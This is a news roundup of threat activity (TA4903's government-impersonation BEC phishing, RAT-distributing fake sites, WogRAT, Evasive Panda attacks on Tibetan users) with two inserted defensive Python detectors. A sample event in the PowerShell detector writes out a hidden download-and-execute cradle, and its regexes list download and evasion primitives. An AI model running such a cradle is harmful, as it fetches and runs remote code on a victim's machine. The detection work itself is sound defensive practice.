Cybercriminal Group Impersonates U.S. Government Entities in BEC Attacks

A group of hackers known as TA4903 has been impersonating U.S. government entities to conduct business email compromise attacks, while other threat actors have been distributing malware targeting Android and Windows users through fake websites.

At a glance

  • TA4903 hackers impersonate U.S. government entities like DOT and USDA.
  • They use QR codes in PDF attachments to redirect to phishing sites.
  • TA4903 targets organizations globally with high-volume email campaigns.
  • Threat actors distribute malware through fake websites targeting Android and Windows users.
  • Evasive Panda conducts watering hole and supply chain attacks targeting Tibetan users.

The details

A gang of hackers known as TA4903, specializing in business email compromise (BEC) attacks, has been impersonating U.S. government entities such as the U.S. Department of Transportation, the U.S. Department of Agriculture, and the U.S. Small Business Administration.

The group, active since at least 2019, has intensified its activities since mid-2023 and through 2024. One of their latest tactics involves using QR codes in PDF document attachments, redirecting recipients to phishing sites resembling official portals of U.S. government agencies.

The actor has used a cyberattack theme as a pretext to trick finance department staff into updating payment details.

TA4903 Targets Organizations Globally

TA4903 targets organizations globally with high-volume email campaigns, particularly in the U.S. They are known to register domain names resembling government entities and private organizations.
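Lookalike domain registration is the part of this tradecraft a mail gateway can check mechanically. The following is an added example (not code from the article or from any vendor cited in it) that classifies a sender domain against a small allow-list of the real agency domains named above. The allow-list, the confusable-character table and the thresholds are assumptions for the example; in practice the allow-list would come from an authoritative source.

```python
import re
from difflib import SequenceMatcher

# Constructed allow-list: real domains of the agencies the article names
# (assumed here for the example; maintain from an authoritative list in practice).
LEGIT_DOMAINS = ["dot.gov", "usda.gov", "sba.gov"]

# Digit/letter substitutions commonly seen in lookalike registrations (constructed table).
CONFUSABLES = {"0": "o", "1": "l", "3": "e", "5": "s", "rn": "m", "vv": "w"}


def fold_confusables(label: str) -> str:
    """Map look-alike characters back to the letters they imitate."""
    for fake, real in CONFUSABLES.items():
        label = label.replace(fake, real)
    return label


def registrable_parts(domain: str):
    """Split 'mail.usda-gov.com' into ('usda-gov', 'com').

    Assumes a one-label public suffix; multi-label suffixes such as co.uk
    would need a public-suffix list, which this example omits.
    """
    labels = domain.lower().strip(".").split(".")
    if len(labels) < 2:
        return labels[0], ""
    return labels[-2], labels[-1]


def classify_sender_domain(domain: str):
    """Return (verdict, matched_legit_domain, reason) for one sender domain."""
    domain = domain.lower().strip(".")

    # Exact domain or a subdomain of it: legitimate.
    for legit in LEGIT_DOMAINS:
        if domain == legit or domain.endswith("." + legit):
            return ("legitimate", legit, "exact")

    sld, _tld = registrable_parts(domain)
    folded = fold_confusables(sld)
    tokens = [t for t in re.split(r"[-_]+", folded) if t]

    for legit in LEGIT_DOMAINS:
        legit_sld, _ = legit.split(".")
        # Same agency name under another TLD, or with confusable characters (u5da.com).
        if folded == legit_sld:
            return ("lookalike", legit, "same name, different TLD or confusable spelling")
        # Agency name combined with a 'gov' token, e.g. usda-gov.com, sba-gov-loans.net.
        if legit_sld in tokens and "gov" in tokens:
            return ("lookalike", legit, "agency name combined with 'gov' token")
        # Near-miss spelling; only for names long enough that the ratio is meaningful.
        # Short names such as 'dot' are deliberately excluded here to avoid flagging
        # unrelated words, and rely on the two stricter rules above.
        if len(legit_sld) >= 4 and SequenceMatcher(None, folded, legit_sld).ratio() >= 0.8:
            return ("lookalike", legit, "near-miss spelling")

    return ("unknown", None, "")


if __name__ == "__main__":
    for d in ["usda.gov", "usda-gov.com", "u5da.com", "usdaa.com", "dotnet.com"]:
        print(d, "->", classify_sender_domain(d))
```

A verdict of "unknown" is not a clean bill of health; it only means the domain does not resemble anything on the allow-list, so the rule belongs alongside DMARC alignment checks rather than replacing them.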

Recently, the group has shifted from spoofing U.S. government entities to impersonating small businesses.

The complexity of their BEC attacks presents detection challenges, emphasizing the need for a comprehensive, multi-layered security strategy to mitigate threats.

Threat Actors Utilizing Fake Websites

Separately, threat actors have been using fake websites to distribute malware targeting Android and Windows users since December 2023. The malware includes remote access trojans (RATs) such as SpyNote RAT for Android and NjRAT and DCRat for Windows.

The spoofed websites, written in Russian, closely resemble legitimate domains to deceive victims.

These websites offer downloads for Android, iOS, and Windows platforms, with the Android download triggering an APK file download and the Windows button initiating a batch script download.

The batch script executes a PowerShell script that downloads and executes the remote access trojan.
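The batch-file-to-PowerShell-to-download chain described above is visible in process-creation telemetry, where the parent/child relationship and the command line together are far more specific than either alone. The following is an added example (not code from the article or from the vendors it cites) that scores constructed process-creation events for that pattern. The event field names are a simplified assumption, not any product's schema, and the sample events, paths and the reserved `example.invalid` host are constructed for the example.

```python
import re

# Constructed sample process-creation events (field names are an assumption).
SAMPLE_EVENTS = [
    {   # batch file launching a hidden PowerShell download cradle
        "pid": 4120,
        "parent_image": r"C:\Windows\System32\cmd.exe",
        "parent_command_line": r'cmd.exe /c "C:\Users\victim\Downloads\installer.bat"',
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                        ".DownloadString('http://example.invalid/stage2.ps1')\"",
    },
    {   # benign deployment batch file running a local script
        "pid": 4133,
        "parent_image": r"C:\Windows\System32\cmd.exe",
        "parent_command_line": r'cmd.exe /c "C:\build\deploy.bat"',
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": r"powershell.exe -File C:\build\scripts\restart-service.ps1",
    },
    {   # interactive PowerShell from the desktop, not batch-launched
        "pid": 4150,
        "parent_image": r"C:\Windows\explorer.exe",
        "parent_command_line": "explorer.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": "powershell.exe -c \"Invoke-WebRequest https://example.invalid/notes.txt\"",
    },
]

# Download cradles and remote-execution primitives commonly seen in loaders.
DOWNLOAD_CRADLE = re.compile(
    r"(downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bwget\b|\bcurl\b"
    r"|net\.webclient|start-bitstransfer|invoke-expression|\biex\b)",
    re.I,
)
# Flags that hide the window, skip profiles, or bypass execution policy.
EVASION_FLAGS = re.compile(
    r"(-enc(odedcommand)?\b|-w(indowstyle)?\s+hidden|-nop(rofile)?\b"
    r"|-ep\s+bypass|-executionpolicy\s+bypass)",
    re.I,
)


def is_batch_launched_powershell(event: dict) -> bool:
    """True when PowerShell was spawned by cmd.exe that is running a .bat/.cmd file."""
    parent = event.get("parent_image", "").lower()
    parent_cmd = event.get("parent_command_line", "").lower()
    image = event.get("image", "").lower()
    return (
        image.endswith(("powershell.exe", "pwsh.exe"))
        and parent.endswith("cmd.exe")
        and (".bat" in parent_cmd or ".cmd" in parent_cmd)
    )


def score_event(event: dict):
    """Return (score, reasons); one point per independent indicator."""
    reasons = []
    if not is_batch_launched_powershell(event):
        return 0, reasons
    reasons.append("powershell spawned by cmd.exe running a batch file")
    cmd = event.get("command_line", "")
    if DOWNLOAD_CRADLE.search(cmd):
        reasons.append("download cradle in command line")
    if EVASION_FLAGS.search(cmd):
        reasons.append("hidden/encoded/bypass flags")
    if re.search(r"https?://", cmd, re.I):
        reasons.append("remote URL in command line")
    return len(reasons), reasons


def find_suspicious(events, threshold: int = 3):
    """Return [(pid, reasons)] for events scoring at or above the threshold."""
    hits = []
    for event in events:
        score, reasons = score_event(event)
        if score >= threshold:
            hits.append((event["pid"], reasons))
    return hits


if __name__ == "__main__":
    for pid, reasons in find_suspicious(SAMPLE_EVENTS):
        print(pid, reasons)
```

The threshold of three keeps legitimate deployment scripts (batch file plus a local `-File` argument) below the alerting line while the combination of batch parent, cradle, hidden window and remote URL scores four; tune it against your own telemetry before enabling it as an alert.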

A new malware, WogRAT, is targeting Windows and Linux systems using a free online notepad platform.

Active since late 2022, WogRAT has targeted Asian countries; it collects system information and supports commands such as executing commands and downloading files.

TA4903, a financially motivated cybercriminal actor, conducts high-volume phishing campaigns to steal corporate credentials by spoofing U.S. government entities and organizations across various sectors.

Attack chains involve QR codes for credential phishing and the EvilProxy phishing kit to bypass 2FA. Once a mailbox is compromised, the threat actor searches for payment, invoice, and bank information. Phishing campaigns have also been used to distribute malware families like DarkGate, Agent Tesla, and Remcos RAT.

Evasive Panda has orchestrated watering hole and supply chain attacks targeting Tibetan users since September 2023, delivering malicious downloaders for Windows and macOS and deploying MgBot and Nightdoor backdoors.

ESET discovered the operation in January 2024, after the group had compromised at least three websites. Evasive Panda, also known as Bronze Highland and Daggerfly, targeted an NGO in Mainland China in April 2023, and Symantec has implicated it in a cyber espionage campaign against telecom service providers in Africa since November 2022. The Tibetan-focused attacks involved compromising the Kagyu International Monlam Trust’s website.

The attackers placed a script on that website to target users in India, Taiwan, Hong Kong, Australia, and the U.S.; Evasive Panda likely aimed at the Tibetan community during the Kagyu Monlam Festival in India in late January and February 2024, using a malicious downloader named “certificate.exe” on Windows and “certificate.pkg” on macOS.

The Nightdoor implant abused the Google Drive API for command-and-control. Evasive Panda also infiltrated an Indian software company’s website to distribute trojanized Windows and macOS installers of Tibetan language translation software.

The Tibetan news website Tibetpost hosted malicious payloads, with the trojanized Windows installer triggering a multi-stage attack sequence to drop MgBot or Nightdoor.

These backdoors gather system information, a list of installed apps, and running processes, among other features.

Article X-ray

Facts attribution

This section links each of the article’s facts back to its original source.

If you suspect false information in the article, you can use this section to investigate where it came from.

bleepingcomputer.com
– A gang of hackers known as TA4903 specializes in business email compromise (BEC) attacks
– TA4903 has been impersonating U.S. government entities such as the U.S. Department of Transportation, the U.S. Department of Agriculture, and the U.S. Small Business Administration
– The group has been active since at least 2019, intensifying activities since mid-2023 and through 2024
– TA4903 has started using QR codes in PDF document attachments as part of their latest tactic
– Recipients scanning the QR codes are redirected to phishing sites resembling official portals of U.S. government agencies
– The threat actor has used the theme of a cyberattack to trick financial department staff into updating payment details
– TA4903 targets organizations globally with high-volume email campaigns, particularly in the U.S.
– The group is known to register domain names resembling government entities and private organizations.
– TA4903 has recently shifted from spoofing U.S. government entities to impersonating small businesses
– The complexity of their BEC attacks provides opportunities for detection, requiring a comprehensive, multi-layered security strategy to mitigate threats.
thehackernews.com
– Threat actors have been using fake websites to distribute malware targeting Android and Windows users since December 2023
– The malware includes Remote Access Trojans (RATs) like SpyNote RAT for Android and NjRAT and DCRat for Windows
– The spoofed websites are in Russian and closely resemble legitimate domains to trick victims
– The websites offer downloads for Android, iOS, and Windows platforms
– Clicking on the Android download button triggers an APK file download, while the Windows button downloads a batch script
– The batch script executes a PowerShell script that downloads and executes the remote access trojan.
– There is no evidence of iOS users being targeted, as the iOS button redirects to the legitimate Apple App Store listing for Skype
– A new malware called WogRAT is targeting Windows and Linux systems using a free online notepad platform
– WogRAT has been active since late 2022 and targets Asian countries
– The malware collects system information and supports commands like executing commands and downloading files
– TA4903 is a financially motivated cybercriminal actor conducting high-volume phishing campaigns to steal corporate credentials
– TA4903 spoofs U.S. government entities and organizations in various sectors
– Attack chains involve QR codes for credential phishing and the EvilProxy phishing kit to bypass 2FA
– Once a mailbox is compromised, the threat actor searches for payment, invoice, and bank information
– Phishing campaigns have also been used to distribute malware families like DarkGate, Agent Tesla, and Remcos RAT
thehackernews.com
– Evasive Panda orchestrated watering hole and supply chain attacks targeting Tibetan users since September 2023
– The attacks aimed to deliver malicious downloaders for Windows and macOS, deploying MgBot and Nightdoor backdoors
– ESET discovered the operation in January 2024 after compromising at least three websites
– Evasive Panda, also known as Bronze Highland and Daggerfly, targeted an NGO in Mainland China in April 2023
– Symantec implicated Evasive Panda in a cyber espionage campaign targeting telecom service providers in Africa since November 2022
– The attacks involved compromising the Kagyu International Monlam Trust’s website
– The attackers placed a script on the website to target users in India, Taiwan, Hong Kong, Australia, and the U.S.
– Evasive Panda likely targeted the Tibetan community during the Kagyu Monlam Festival in India in late January and February 2024
– The attacks used a malicious downloader named “certificate.exe” on Windows and “certificate.pkg” on macOS
– The Nightdoor implant abused the Google Drive API for command-and-control
– Evasive Panda infiltrated an Indian software company’s website to distribute trojanized Windows and macOS installers of Tibetan language translation software
– The attackers also used the Tibetan news website Tibetpost to host malicious payloads
– The trojanized Windows installer triggers a multi-stage attack sequence to drop MgBot or Nightdoor
– MgBot and Nightdoor backdoors gather system information, a list of installed apps, and running processes, among other features